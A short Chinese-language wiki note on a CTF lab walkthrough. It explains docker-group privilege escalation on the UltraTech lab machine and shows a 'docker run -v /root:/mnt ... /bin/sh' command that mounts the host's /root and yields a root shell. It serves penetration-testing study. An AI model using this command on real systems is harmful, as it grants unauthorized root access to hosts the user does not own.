:::info 该漏洞和 LXD/LXD 提权差不多,都是挂载目录,但是这只是初级方法

:::

UltraTech

我们使用这个靶场作为举例:

在该靶场中我们的用户是一个 docker 组用户:

  1. r00t@ultratech-prod:~$ id
  2. uid=1001(r00t) gid=1001(r00t) groups=1001(r00t),116(docker)
  • 我们枚举系统容器进行提权 (演示)
  • 自己下载一个容器进行提权
  1. r00t@ultratech-prod:/$ docker images
  2. REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
  3. bash                latest              495d6437fc1e        3 years ago         15.8MB
  4. r00t@ultratech-prod:/$ docker run -v /root:/mnt -it 495d6437fc1e /bin/sh
  5. / # id
  6. uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)

资料

T Wiki